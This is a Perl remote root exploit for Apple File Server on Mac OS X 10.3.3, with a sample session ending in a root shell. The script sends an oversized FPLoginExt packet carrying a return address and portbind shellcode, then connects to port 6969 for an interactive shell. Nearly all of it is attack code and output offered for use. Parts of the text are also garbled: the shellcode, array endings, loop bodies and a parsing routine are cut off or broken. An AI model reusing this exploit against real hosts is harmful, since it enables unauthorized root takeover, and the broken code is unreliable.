# Priv8security com remote root exploit for AppleFileServer.
# Bug found by Dave G. and Dino Dai Zovi.
# URL:
# [wsxz@localhost buffer]$ perl -h -t 0
# -=[ Apple File Server remote root exploit!]=-
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
# ****** Welcome to 'Adriano-Limas-Computer' ******
# Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar
# 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc
# uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty),
# 5(operator), 20(staff), 31(guest), 80(admin)
use IO::Socket;

use Getopt::Std; getopts('h:t:p:o:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'t'})) { $target = $args{'t'}; }
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;}
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}

my @targets = (
# description, ret, Magic size.
["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4

print STDERR "-=[ Apple File Server remote root exploit!]=-\n\n";

if (!defined($host) || !defined($target)) {

($desc,$ret,$msize) = @{$targets[$target]};

print STDERR "[+] Using target: $desc\n";
print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "\n";

$shellcode = # portbind shellcode by br00t [at]

$bin_ret = reverse(pack('l', ($ret + $offset)));

$buffer = "\x60" x 141;
$buffer .= $bin_ret;
$buffer .= "\x60" x (824 - length($shellcode));
$buffer .= $shellcode;
$buffer .= "A" x 100;

$req =
"\x00\x04".# Request Opensession

$packet = 
"\x00". # Request
"\x02". # Command
"\x7a\x69".# leet ID
"\x00\x00\x00\x00".# Data Offset
"\x00\x00\x04\x00".# Length
"\x00\x00\x00\x00".# Reserved
"\x3f". # FPloginext
"\x00". # Pad
"\x00\x00". # Flags
"\x0e\x41\x46\x50\x56\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31".# Version
"\x10\x43\x6c\x65\x61\x72\x74\x78\x74\x20\x70\x61\x73\x73\x77\x72\x64". # UAM
"\x03". # Type
"\x00\x07". # User Len
"\x41\x64\x72\x69\x61\x6e\x6f" .# AFPNAME USER
"\x03". # Pathtype
"\x80\xff". # Path Len
$buffer. # Evil String
"\x00"; # Pad

$len = reverse(pack("S", $msize));

substr($packet, 63 , 2, $len);

$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant connect: $!\n\n";

print STDERR "[+] Sending Request Opensession... ";

print STDERR "DOne!\n";

print STDERR "[+] Got response packet:\n";

print STDERR "[+] Sending FPloginEXT packet... ";
print STDERR "DOne!\n";
print STDERR "[+] Waiting... ";


$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1)
or die "No luck :( $!\n\n";

print "We got in =)\n";



print $sc "echo;echo \"****** Welcome to '`hostname -s`' ******\"\n";
print $sc "echo;uname -a;id;echo\n";

die "cant fork: $!" unless defined($pid = fork());

if ($pid) {
while(defined ($line = )) {
print STDOUT $line;
kill("TERM", $pid);
while(defined ($line = )) {
print $sc $line;
print "Good bye!!\n";

sub parse_packet
my ($buf) = shift @_;
my (@packet);
my ($i);

for ($i=0;$i

